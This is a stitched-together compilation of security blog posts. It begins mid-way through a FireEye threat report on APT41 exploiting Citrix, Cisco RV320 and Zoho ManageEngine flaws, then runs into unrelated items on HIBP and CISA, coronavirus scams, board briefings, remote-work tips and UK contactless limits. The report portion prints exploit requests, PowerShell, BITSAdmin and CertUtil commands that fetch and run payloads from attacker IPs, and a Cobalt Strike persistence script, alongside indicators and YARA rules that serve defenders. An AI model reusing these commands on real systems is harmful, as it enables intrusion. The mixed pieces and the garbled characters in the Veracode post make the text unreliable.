We did not observe APT41 activity at FireEye customers between February 2 and February 19, 2020. China initiated COVID-19 related quarantines in cities in Hubei province starting on January 23 and January 24, and rolled out quarantines to additional provinces starting between February 2 and February 10. While it is possible that this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have remained active in other ways, which we were unable to observe with FireEye telemetry. We observed a significant uptick in CVE-2019-19781 exploitation on February 24 and February 25. The exploit behavior was almost identical to the activity on February 1, where only the name of the payload ‘un’ changed.

POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Accept-Encoding: identity
Content-Length: 145
Connection: close
Nsc_User: ../../../netscaler/portal/templates/[redacted]
User-Agent: Python-urllib/2.7
Nsc_Nonce: nsroot
Host: [redacted]
Content-Type: application/x-www-form-urlencoded

url=http://example.com&title= [redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/un`') %]

Figure 4: Example APT41 HTTP traffic exploiting CVE-2019-19781

Citrix released a mitigation for CVE-2019-19781 on December 17, 2019, and as of January 24, 2020, released permanent fixes for all supported versions of Citrix ADC, Gateway, and SD-WAN WANOP.

Cisco Router Exploitation

On February 21, 2020, APT41 successfully exploited a Cisco RV320 router at a telecommunications organization and downloaded a 32-bit ELF binary payload compiled for a 64-bit MIPS processor named ‘fuc’ (MD5: 155e98e5ca8d662fad7dc84187340cbc). It is unknown what specific exploit was used, but there is a Metasploit module that combines two CVE’s (CVE-2019-1653 and CVE-2019-1652) to enable remote code execution on Cisco RV320 and RV325 small business routers and uses wget to download the specified payload.

GET /test/fuc
HTTP/1.1
Host: 66.42.98\.220
User-Agent: Wget
Connection: close

Figure 5: Example HTTP request showing Cisco RV320 router downloading a payload via wget

66.42.98[.]220 also hosted a file name http://66.42.98[.]220/test/1.txt. The content of 1.txt (MD5:  c0c467c8e9b2046d7053642cc9bdd57d) is ‘cat /etc/flash/etc/nk_sysconfig’, which is the command one would execute on a Cisco RV320 router to display the current configuration.

Cisco PSIRT confirmed that fixed software to address the noted vulnerabilities is available and asks customers to review the following security advisories and take appropriate action:

Exploitation of CVE-2020-10189 (Zoho ManageEngine Zero-Day Vulnerability)

On March 5, 2020, researcher Steven Seeley, published an advisory and released proof-of-concept code for a zero-day remote code execution vulnerability in Zoho ManageEngine Desktop Central versions prior to 10.0.474 (CVE-2020-10189). Beginning on March 8, FireEye observed APT41 use 91.208.184[.]78 to attempt to exploit the Zoho ManageEngine vulnerability at more than a dozen FireEye customers, which resulted in the compromise of at least five separate customers. FireEye observed two separate variations of how the payloads (install.bat and storesyncsvc.dll) were deployed. In the first variation the CVE-2020-10189 exploit was used to directly upload “logger.zip”, a simple Java based program, which contained a set of commands to use PowerShell to download and execute install.bat and storesyncsvc.dll.

java/lang/Runtime

getRuntime

()Ljava/lang/Runtime;

Xcmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/install.bat','C:\
Windows\Temp\install.bat')&powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/storesyncsvc.dll','
C:\Windows\Temp\storesyncsvc.dll')&C:\Windows\Temp\install.bat

'(Ljava/lang/String;)Ljava/lang/Process;

StackMapTable

ysoserial/Pwner76328858520609

Lysoserial/Pwner76328858520609;

Figure 6: Contents of logger.zip

Here we see a toolmark from the tool ysoserial that was used to create the payload in the POC. The string Pwner76328858520609 is unique to the POC payload, indicating that APT41 likely used the POC as source material in their operation.

In the second variation, FireEye observed APT41 leverage the Microsoft BITSAdmin command-line tool to download install.bat (MD5: 7966c2c546b71e800397a67f942858d0) from known APT41 infrastructure 66.42.98[.]220 on port 12345.

Parent Process: C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe

Process Arguments: cmd /c bitsadmin /transfer bbbb http://66.42.98[.]220:12345/test/install.bat C:\Users\Public\install.bat

Figure 7: Example FireEye Endpoint Security event depicting successful CVE-2020-10189 exploitation

In both variations, the install.bat batch file was used to install persistence for a trial-version of Cobalt Strike BEACON loader named storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f).

@echo off

set "WORK_DIR=C:\Windows\System32"

set "DLL_NAME=storesyncsvc.dll"

set "SERVICE_NAME=StorSyncSvc"

set "DISPLAY_NAME=Storage Sync Service"

set "DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run collectly."

 sc stop %SERVICE_NAME%

sc delete %SERVICE_NAME%

mkdir %WORK_DIR%

copy "%~dp0%DLL_NAME%" "%WORK_DIR%" /Y

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "%SERVICE_NAME%" /t REG_MULTI_SZ /d "%SERVICE_NAME%" /f

sc create "%SERVICE_NAME%" binPath= "%SystemRoot%\system32\svchost.exe -k %SERVICE_NAME%" type= share start= auto error= ignore DisplayName= "%DISPLAY_NAME%"

SC failure "%SERVICE_NAME%" reset= 86400 actions= restart/60000/restart/60000/restart/60000

sc description "%SERVICE_NAME%" "%DESCRIPTION%"

reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /f

reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /v "ServiceDll" /t REG_EXPAND_SZ /d "%WORK_DIR%\%DLL_NAME%" /f

net start "%SERVICE_NAME%"

Figure 8: Contents of install.bat

Storesyncsvc.dll was a Cobalt Strike BEACON implant (trial-version) which connected to exchange.dumb1[.]com (with a DNS resolution of 74.82.201[.]8) using a jquery malleable command and control (C2) profile.

GET /jquery-3.3.1.min.js HTTP/1.1
Host: cdn.bootcss.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://cdn.bootcss.com/
Accept-Encoding: gzip, deflate
Cookie: __cfduid=CdkIb8kXFOR_9Mn48DQwhIEuIEgn2VGDa_XZK_xAN47OjPNRMpJawYvnAhPJYM
DA8y_rXEJQGZ6Xlkp_wCoqnImD-bj4DqdTNbj87Rl1kIvZbefE3nmNunlyMJZTrDZfu4EV6oxB8yKMJfLXydC5YF9OeZwqBSs3Tun12BVFWLI
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive Cache-Control: no-cache

Figure 9: Example APT41 Cobalt Strike BEACON jquery malleable C2 profile HTTP request

Within a few hours of initial exploitation, APT41 used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor with a different C2 address that uses Microsoft CertUtil, a common TTP that we’ve observed APT41 use in past intrusions, which they then used to download 2.exe (MD5: 3e856162c36b532925c8226b4ed3481c). The file 2.exe was a VMProtected Meterpreter downloader used to download Cobalt Strike BEACON shellcode. The usage of VMProtected binaries is another very common TTP that we’ve observed this group leverage in multiple intrusions in order to delay analysis of other tools in their toolkit.

GET /2.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.3
Host: 91.208.184[.]78

Figure 10: Example HTTP request downloading ‘2.exe’ VMProtected Meterpreter downloader via CertUtil

certutil  -urlcache -split -f http://91.208.184[.]78/2.exe

Figure 11: Example CertUtil command to download ‘2.exe’ VMProtected Meterpreter downloader

The Meterpreter downloader ‘TzGG’ was configured to communicate with 91.208.184[.]78 over port 443 to download the shellcode (MD5: 659bd19b562059f3f0cc978e15624fd9) for Cobalt Strike BEACON (trial-version).

GET /TzGG HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
Host: 91.208.184[.]78:443
Connection: Keep-Alive
Cache-Control: no-cache

Figure 12: Example HTTP request downloading ‘TzGG’ shellcode for Cobalt Strike BEACON

The downloaded BEACON shellcode connected to the same C2 server: 91.208.184[.]78. We believe this is an example of the actor attempting to diversify post-exploitation access to the compromised systems.

ManageEngine released a short term mitigation for CVE-2020-10189 on January 20, 2020, and subsequently released an update on March 7, 2020, with a long term fix.

Outlook

This activity is one of the most widespread campaigns we have seen from China-nexus espionage actors in recent years. While APT41 has previously conducted activity with an extensive initial entry such as the trojanizing of NetSarang software, this scanning and exploitation has focused on a subset of our customers, and seems to reveal a high operational tempo and wide collection requirements for APT41.

It is notable that we have only seen these exploitation attempts leverage publicly available malware such as Cobalt Strike and Meterpreter. While these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance. In 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks. This new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage.

Previously, FireEye Mandiant Managed Defense identified APT41 successfully leverage CVE-2019-3396 (Atlassian Confluence) against a U.S. based university. While APT41 is a unique state-sponsored Chinese threat group that conducts espionage, the actor also conducts financially motivated activity for personal gain.

Indicators

Type

Indicator(s)

CVE-2019-19781 Exploitation (Citrix Application Delivery Control)

66.42.98[.]220

CVE-2019-19781 exploitation attempts with a payload of ‘file /bin/pwd’

CVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/bsd’

CVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/un’

/tmp/bsd

/tmp/un

Cisco Router Exploitation

66.42.98\.220

‘1.txt’ (MD5:  c0c467c8e9b2046d7053642cc9bdd57d)

‘fuc’ (MD5: 155e98e5ca8d662fad7dc84187340cbc

CVE-2020-10189 (Zoho ManageEngine Desktop Central)

66.42.98[.]220

91.208.184[.]78

74.82.201[.]8

exchange.dumb1[.]com

install.bat (MD5: 7966c2c546b71e800397a67f942858d0)

storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f)

C:\Windows\Temp\storesyncsvc.dll

C:\Windows\Temp\install.bat

2.exe (MD5: 3e856162c36b532925c8226b4ed3481c)

C:\Users\[redacted]\install.bat

TzGG (MD5: 659bd19b562059f3f0cc978e15624fd9)

C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe spawning cmd.exe and/or bitsadmin.exe

Certutil.exe downloading 2.exe and/or payloads from 91.208.184[.]78

PowerShell downloading files with Net.WebClient

Detecting the Techniques

FireEye detects this activity across our platforms. This table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.

Platform

Signature Name

Endpoint Security

 

BITSADMIN.EXE MULTISTAGE DOWNLOADER (METHODOLOGY)

CERTUTIL.EXE DOWNLOADER A (UTILITY)

Generic.mg.5909983db4d9023e

Generic.mg.3e856162c36b5329

POWERSHELL DOWNLOADER (METHODOLOGY)

SUSPICIOUS BITSADMIN USAGE B (METHODOLOGY)

SAMWELL (BACKDOOR)

SUSPICIOUS CODE EXECUTION FROM ZOHO MANAGE ENGINE (EXPLOIT)

Network Security

Backdoor.Meterpreter

DTI.Callback

Exploit.CitrixNetScaler

Trojan.METASTAGE

Exploit.ZohoManageEngine.CVE-2020-10198.Pwner

Exploit.ZohoManageEngine.CVE-2020-10198.mdmLogUploader

Helix

CITRIX ADC [Suspicious Commands]
 EXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Attempt]
 EXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Success]
 EXPLOIT - CITRIX ADC [CVE-2019-19781 Payload Access]
 EXPLOIT - CITRIX ADC [CVE-2019-19781 Scanning]
 MALWARE METHODOLOGY [Certutil User-Agent]
 WINDOWS METHODOLOGY [BITSadmin Transfer]
 WINDOWS METHODOLOGY [Certutil Downloader]

MITRE ATT&CK Technique Mapping

ATT&CK

Techniques

Initial Access

External Remote Services (T1133), Exploit Public-Facing Application (T1190)

Execution

PowerShell (T1086), Scripting (T1064)

Persistence

New Service (T1050)

 

Privilege Escalation

Exploitation for Privilege Escalation (T1068)

 

Defense Evasion

BITS Jobs (T1197), Process Injection (T1055)

 

 

Command And Control

Remote File Copy (T1105), Commonly Used Port (T1436), Uncommonly Used Port (T1065), Custom Command and Control Protocol (T1094), Data Encoding (T1132), Standard Application Layer Protocol (T1071)

Appendix A: Discovery Rules

The following Yara rules serve as examples of discovery rules for APT41 actor TTPs, turning the adversary methods or tradecraft into new haystacks for purposes of detection or hunting. For all tradecraft-based discovery rules, we recommend deliberate testing and tuning prior to implementation in any production system. Some of these rules are tailored to build concise haystacks that are easy to review for high-fidelity detections. Some of these rules are broad in aperture that build larger haystacks for further automation or processing in threat hunting systems.

import "pe"

rule ExportEngine_APT41_Loader_String

{

            meta:

                        author = "@stvemillertime"

                        description "This looks for a common APT41 Export DLL name in BEACON shellcode loaders, such as loader_X86_svchost.dll"

            strings:

                        $pcre = /loader_[\x00-\x7F]{1,}\x00/

            condition:

                        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))

}

rule ExportEngine_ShortName

{

    meta:

        author = "@stvemillertime"

        description = "This looks for Win PEs where Export DLL name is a single character"

    strings:

        $pcre = /[A-Za-z0-9]{1}\.(dll|exe|dat|bin|sys)/

    condition:

        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))

}

rule ExportEngine_xArch

{

    meta:

        author = "@stvemillertime"

        description = "This looks for Win PEs where Export DLL name is a something like x32.dat"

            strings:

             $pcre = /[\x00-\x7F]{1,}x(32|64|86)\.dat\x00/

            condition:

             uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))

}

rule RareEquities_LibTomCrypt

{

    meta:

        author = "@stvemillertime"

        description = "This looks for executables with strings from LibTomCrypt as seen by some APT41-esque actors https://github.com/libtom/libtomcrypt - might catch everything BEACON as well. You may want to exclude Golang and UPX packed samples."

    strings:

        $a1 = "LibTomMath"

    condition:

        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $a1

}

rule RareEquities_KCP

{

    meta:

        author = "@stvemillertime"

        description = "This is a wide catchall rule looking for executables with equities for a transport library called KCP, https://github.com/skywind3000/kcp Matches on this rule may have built-in KCP transport ability."

    strings:

        $a01 = "[RO] %ld bytes"

        $a02 = "recv sn=%lu"

        $a03 = "[RI] %d bytes"

        $a04 = "input ack: sn=%lu rtt=%ld rto=%ld"

        $a05 = "input psh: sn=%lu ts=%lu"

        $a06 = "input probe"

        $a07 = "input wins: %lu"

        $a08 = "rcv_nxt=%lu\\n"

        $a09 = "snd(buf=%d, queue=%d)\\n"

        $a10 = "rcv(buf=%d, queue=%d)\\n"

        $a11 = "rcvbuf"

    condition:

        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 5MB and 3 of ($a*)

}

rule ConventionEngine_Term_Users

{

            meta:

                        author = "@stvemillertime"

                        description = "Searching for PE files with PDB path keywords, terms or anomalies."

                        sample_md5 = "09e4e6fa85b802c46bc121fcaecc5666"

                        ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"

            strings:

                        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}Users[\x00-\xFF]{0,200}\.pdb\x00/ nocase ascii

            condition:

                        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre

}

rule ConventionEngine_Term_Desktop

{

            meta:

                        author = "@stvemillertime"

                        description = "Searching for PE files with PDB path keywords, terms or anomalies."

                        sample_md5 = "71cdba3859ca8bd03c1e996a790c04f9"

                        ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"

            strings:

                        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}Desktop[\x00-\xFF]{0,200}\.pdb\x00/ nocase ascii

            condition:

                        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre

}

rule ConventionEngine_Anomaly_MultiPDB_Double

{

            meta:

                        author = "@stvemillertime"

                        description = "Searching for PE files with PDB path keywords, terms or anomalies."

                        sample_md5 = "013f3bde3f1022b6cf3f2e541d19353c"

                        ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"

            strings:

                        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}\.pdb\x00/

            condition:

                        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and #pcre == 2

}

When it comes to cybersecurity, we need to adapt for now and the future

The question of the moment is: How are you holding up? These are trying times for everyone, trying to understand how to work with reduced and staggered staffing, and when possible remotely from home. Entire families in many cases are distanced from each other, while others are sharing more togetherness time than they have had in years. Beyond the disruption of adjusting to this way of working, there is the need to pay extra attention to cybersecurity.

Cybercriminals are taking advantage of overworked (and in many cases remote) IT and security teams, lax security protocols on personal devices being used to work from home, and fear. They are using the coronavirus to attack vulnerable organizations and individuals at a time when SOCs aren’t being staffed by their regular teams.

To read this article in full, please click here

Welcoming the USA Government to Have I Been Pwned

Welcoming the USA Government to Have I Been Pwned

Over the last 2 years I've been gradually welcoming various governments from around the world onto Have I Been Pwned (HIBP) so that they can have full and unfettered access to the list of email addresses on their domains impacted by data breaches. Today, I'm very happy to announce the expansion of this initiative to include the USA government by way of their US Cybersecurity and Infrastructure Security Agency (CISA). CISA now has the ability to query US government domains via API and receive notifications when they're impacted in subsequent data breaches.

Over the coming months I expect to continue expanding the scope of government support in HIBP. For now, it's a big welcome to the USA and I'm enormously happy to see HIBP able to support them in this fashion.

Coronavirus Cybersecurity: Scams To Watch Out For

The Coronavirus pandemic has shocked the world in recent months, with many countries being forced to go into lockdown or encourage its nationals to self-isolate as much as possible. Many are trying to work out how to juggle working from home, caring for their children, managing their finances and looking after their health! But sadly, there’s one more thing you need to add to that list - staying safe online and watching out for scammers. 

That’s because cybercriminals have decided to take advantage of the global fear, confusion and uncertainty around the world. Plus, vast numbers of people are now working from home and this usually means they are doing so with less cybersecurity measures in place than they would have in their office. 

Malicious messages examples seen
  • email and social media messages impersonating medical expert bodies including the NHS, World Health Organization (WHO), and Centre for Disease and Control (CDC), requesting a donation to research a vaccine.
  • GOV.UK themed text messages titled 'You are eligible to get a tax refund (rebate) of 128.34 GBP
  • messages advertising protective masks and hand sanitisers from bogus websites
So, despite this being a time when we all need to pull together and help one another out, there are still scammers out there looking to cause trouble. To help keep you safe online, Evalian has compiled a list of four of the most common Coronavirus scams happening right now, so you know what to look out for. 

1. Phishing Scams 
This is perhaps the biggest scam out there right now because phishing emails can come in many different forms. Most commonly, hackers are pretending to be health officials or national authorities offering advice about staying safe during the Corona outbreak. The reality is that they are trying to trick unsuspecting individuals into downloading harmful malware or providing sensitive, personal information. 

Some of these phishing emails look really sophisticated, with one in particular being a fake email sent from the World Health Organisation (WHO), offering tips on how to avoid falling ill with the virus. Once the email user clicks on the link provided, they are redirected to a site that steals their personal information. The problem is, with so many people being genuinely worried about their health and hoping to stop the spread, many don’t suspect that these types of emails could be a scam. 

The best way to avoid falling victim to these types of phishing emails is to look for suspicious email addresses or lots of spelling mistakes. And even if the email looks pretty legitimate, it might still be worth going direct to the sender’s website instead. For example, going direct to the World Health Organisation website for advice means you can avoid clicking any links from the email. That way you can find the information you need and reduce the risk of falling victim to a cybercrime. 

Secondly, if an email asks for money or bitcoin donations to help tackle Coronavirus, don’t make any transfers. Again, if you wish to help by donating money or services, go directly to the websites of charities or health organisations to see how you can help.

It’s also worth noting, that these phishing scams can also be received as a text message or phone call. If you receive strange texts or voicemails asking for donations, giving offers on vaccines or warning you about cases in your local area, approach with caution and certainly don’t give away any of your personal details. 

2. Fake Websites
Another common scam designed to play on fear and uncertainty is the setting up of fake websites. Cybercriminals are creating Coronavirus-related websites which claim to offer pharmaceuticals or remedies for the virus such as testing kits, vaccines, and other fake health solutions. The idea is to get anxious victims to part with their bank details or to hack their computer and install malware on their systems. 

In these situations, there are some things you can do. Firstly, check if the website has a secure connection. You’ll know whether it does or doesn't by the padlock in the search bar. If there is a padlock in the search bar this means the site is secure, if there isn't, then it’s a good idea to avoid this site. Not only this but if the website is poorly designed and the text has a lot of spelling and grammatical errors, this could also be a big red flag. 

Finally, it’s also important to be aware that not many sites are genuinely going to be offering these health solutions and if they appear to be selling in-demand products at an extremely low price, then it’s most likely a scam. Remember, if it seems to good to be true then it probably is. 

3. App Scams 
Cybercriminals are also targeting smartphones and mobile devices with dedicated Coronavirus apps. These apps claim to track the spread of the virus in your local area and with many people concerned about the proximity of the virus to their home, it’s not surprising that people are willing to download such an app. 

The reality, however, is that the app then installs malware into your device and not only comprises your tech, but also all the personal information stored within it. In some cases, the app can lock victims out of their phone or tablet demanding a ransom to get back in, threatening to delete all the information, contact details and photos stored inside.

4. Fake Coronavirus Maps
Last but not least, the fake Coronavirus map scam. Similar to that of the tracking app, cybercriminals have begun circulating graphics of fake maps on which they claim to highlight where all the Coronavirus cases are in your country. These are usually sent round on social media and through email. 

Of course, these images are not meant to educate or help you in any way. In fact, the scammers include malware in the links so that once you’ve clicked to open the image this immediately infects your device. In most cases, this has been reported to be the kind of bug that can steal data such as bank details, passwords, login information and other sensitive data stored on your device. 

Look for the Red Flags 
  • Never open attachments or click on links within suspicious or unexpected emails, text and social media messages
  • Look for the suspicious signs; does the message convey a sense of urgency to perform an action?
  • Always remember legitimate organisations never ask for passwords, payment card details and sensitive data to be sent by email
In these troubling and uncertain times, you’d be forgiven for falling for a scam if you thought for one second it could help to keep you and your family safe from this virus. But sadly, there are criminals out there taking advantage of people’s anxiety. So just be aware that these scams are happening and look out for the red flags we’ve mentioned above to help you stay safe online. 

Briefing the board on security: Put data in the driver’s seat

With the annual costs of cybercrime in the trillions of dollars, the boardroom conversations CIOs have about cybersecurity are weighted with anxieties on both sides.

“We have a burning platform, and that’s a leadership opportunity” CIOs should step up and seize, says Bob Zukis, founder of the Digital Directors Network, an executive association that advocates for technology expertise on boards. “The board is focused on value-creating opportunities, so the two conversations need to go hand in hand.” 

Yet as technology topics go, information security has always been prone to geeky acronyms, cartoonish names for dangerous malware and technical complexities that defy concise explanations to businesspeople. 

To read this article in full, please click here

(Insider Story)

We’re All WFH Too – Here’s What We’ve Learned

Veracoders, like many of you, are facing the new reality of working from home, all day, every day. We have some employees who were already working 100 percent remotely, but also many who were accustomed to life in the office and are making the big shift to remote life.

So, it???s not surprising that some Veracoders are completely prepared for this new way of life and some are, well, working with what they have.

ツ?My desk setupツ? ツ? ツ?ツ?ツ?Office Setup

Yes, that???s my cramped workstation on the left, compared to a seasoned remote Veracoder with a pretty epic office setup on the right.

I should add, our life in the office was great. Before this global problem, I worked out of our office in Burlington, Massachusetts, and it???s a pretty special place, so this has been an adjustment. We???re a collaborative bunch ??? from bagels in the cafテゥ on Mondays, Wednesdays, and Fridays,ツ?to 404s on Friday evenings, monthly town halls, and twice a year Hackathons ??? you get the idea. We hung out together a lot!

And now we???re asking ourselves, how do we keep that spirit alive? How do we stay sane, productive, and connected ??? especially when all the kids are home too? We???ve all been sharing our tips, tricks, and advice over Slack, so we thought it might be good to share so everyone can learn from our experiences. We???ve also been asking our more experienced remote workers to share their best practices.

Keep up with your normal morning routine

When you don???t need to head into an office building every day, keeping up with your regular morning routine can help you level-set your mind. Whether that means taking a shower and getting dressed (in something other than pajamas) or sitting down in a comfortable chair to go through your morning email-checking tasks, practicing these regular routines is a great way to set the tone for the day. You may not need to go to an extreme like this gentleman, but any semblance of normalcy will help.

Make your workspace functional and comfortable

As Veracoder Marcus Watson shared, it???s important that you treat your back right when you???re working from home. ???Look after your back. If you're going to be working from home for an extended period of time, a comfy chair is essential,??? Marcus says. ???Dining chairs are great for a 30-minute meal, but if you're at your desk for a while, consider investing in an office chair with good back support. I have a local company that sells second-hand office supplies and that's where I got my desk and chair from.???

It???s important, he says, to also see if there???s a way toツ?use a proper monitor so that you???re less likely to slouch and add lumbar support to your chair by using a pillow or rolling up a towel.

Marcus's Setup???

Marcus has an impressive at-home desk setup with a microphone for clear calls and a light that he can adjust during video chats. And he keeps a friend with him, too. Notice the yellow duck? Rubber duck debugging is something Marcus practices while at home; it helps him debug code by explaining it line-by-line to the duck, which is especially handy when programmers don???t have a coworker nearby.ツ?

Don???t stress about inevitable interruptions

We???re all in the same boat as we adjust to working from home, and that comes with everyday distractions like noisy family members or pet interruptions. These are inevitable. Don???t stress if your daughter pops up in the background of a video call (unless you're beingツ?interviewed by BBCツ?news, that's not good)ツ?or your dog barks at the Amazon delivery driver when you???re on the phone with your boss. These things will happen, and your coworkers should understand.ツ?

Veracoder Ryan O???Boyle has a great tip for combatting interruptions: ???I have a smart bulb in my office that I use to let my family know I???m on a call. When I???m joining a call I trigger my ???ON AIR??? scene and it lights up red. Haven???t had much luck with it preventing pet intrusions though.??? What a bright idea.

If you have a jam-packed meeting schedule one day and you know you???ll need that peace and quiet, try taking shifts with your spouse, partner, or another family member. They can keep the kids and pets busy if need be and give you a break in the process. Mimicking your office environment will help you set boundaries, too. Veracoder David Buckle not only has a similar equipment setup at home as he does at work, but also his Veracode-branded desk necessities came with him.ツ?

David's Officeツ? ツ?ツ? ツ?ツ?David's WFH office

David explains: ???I have tried to make my temporary WFH office as much like my normal office desk including Veracode branded/themed items.???

Try new learning techniques with your kids

The luster of school closures can wear off fast when kids sit down to open the same books day after day. If they get fussy over the material, try alternatives like interactive educational video games that will keep them engaged and busy. Check your online communities too. Teachers and parents alike are sharing ideas, tips, and even frustrations with each other. You can also browse hashtags like #homeschooling on social media to gather inspiration for keeping kids productive and interested.

Display a schedule in your personalized workspace

At home, it???s all too easy to work past normal office hours. You can skirt around this issue by following a clearly defined work schedule for yourself, even if it means setting alarms on your phone so that you remember when it???s time to shift gears. This will prevent you from working at night, too, which can disrupt your sleeping schedule ??? unless you???re naturally a night owl.ツ?

Veracoder Jim Jastrzebski shares this great tip for leaping over scheduling hurdles: ???Someone very smart once told me that most people don't schedule their work, they schedule interruptions to their work - like meetings. Scheduling the important, no matter what it is, is a good practice.???

Personalizingツ?your workspace just like you tailor your schedule to daily tasks and to-dos can help you get into the groove. It'll feel more like home???or in some cases, more like your home-away-from-homeツ?office space, which I know I'm missing right now just like many of you.ツ?

Doug's officeツ? ツ? ツ?ツ?ツ?Doug's home office

Veracode's ownツ?Doug Wilcox sharesツ?the above photos of his too-cool office desk (left) and equally awesome home workspace (right).

Set a defined schedule for your kids, too

Schedules are essential for kids, pandemic or not. Use a whiteboard or piece of paper to write out their schedules for schoolwork, food breaks, playtime, and other essential activities. If you set these items with clear time commitments, it???s easier for kids to stick to a structured schedule and check off their to-do boxes every day. Everyone wins.

Veracoder Darren Meyer shares this tip: ???Don???t try to work the normal whole day through. Schedule work blocks followed by hanging out with, playing with, etc. the kids. I work about 2-3h and then take an hour with my kids. I still get 8-9h a day, my day just ends later.???

And if you decide not to follow a schedule, word to the wise???your kids may try to scare you with the latest ???smoking toilet??? meme that???s floating around the internet.

Overcommunicate with family and set physical boundaries

Overcommunication and clear boundaries are essential when uncertainty and isolation begin to take their toll. Make sure that children and partners recognize your work schedule and understand that you???re sticking to it every day. If need be, designate a defined ???private space??? that you can claim should you need to escape for an important call or focus on finishing a project. Those physical boundaries might be just what you need to get through daily distractions.

Rob's Office???

Veracoder Rob Layzell carved out a workspace for himself at home, and it looks cozy!

Remember to take physical breaks throughout the day

Physical activity can change drastically when you???re isolated at home. Get some fresh air and go for a walk, do some exercises, or take up a virtual yoga class. If your coworkers are struggling to remember their own physical breaks, set up group chats on Slack or Teams and encourage each other to step away from the screen every so often.

You can even break for housework tasks that you rarely get the chance to tackle; you???ll feel more productive throughout the day and reduce the risk of uncomfortable tension and pain that comes from makeshift desk setups at home. ツ?

Schedule calls and video chats with coworkers to catch up

When the lines start to blur between work and home life, you might forget to check in on the coworkers that you regularly catch up with at the office. Reaching out and having non-work-related conversations with your coworkers helps shake the cobwebs of isolation and brings a sense of normalcy to your schedule (cats optional).

Toshi the helper???

Veracoder Suzanne Ciccone enjoys breaks with her furry coworker Toshi (when he???s not sitting on the keyboard, that is).

Some Veracoders are making it a point to schedule morning coffee catchups that are helpful for boosting morale and setting the tone for the day. If you???re feeling extra disconnected, consider having lunch with coworkers over Slack or Zoom video chat to regroup and break up the workday. It???s a small gesture that will make a big impact.

We???re all in this together

Maybe a little clichテゥ, but it???s true. We???ve seen it here at Veracode ??? despite the uncertainty, stress, and sudden shift in routines, Veracoders as a group have been incredibly positive and supportive of each other and our customers over the past week (and surely, beyond). I said at the beginning of this blog that Veracode is a special place. Clearly, that applies regardless of whether we???re sharing an office or not.

We???ve also seen the support and idea-sharing across the country and world. In that spirit, we???re thinking about more blog posts on working in this new reality ??? if you have any tips, stories, or best practices, send us a note on Twitter, Facebook, or LinkedIn.

Stay safe out there, everyone!ツ?

ツ?

UK Payment Card Contactless Limit Increased from £30 to £45 prevent Coronavirus Spread

The contactless payment card limit for in-store card transactions in the UK will be increased from £30 to £45 from 1st April. A good move for preventing COVID-19 spread at supermarkets and petrol stations via card payment pinpads, which are impossible to keep sanitised.

Better still, everyone right now can benefit from secure MFA contactless payments with higher limits by setting up Apple Pay, Google Pay or, Samsung Pay on your smartphone.

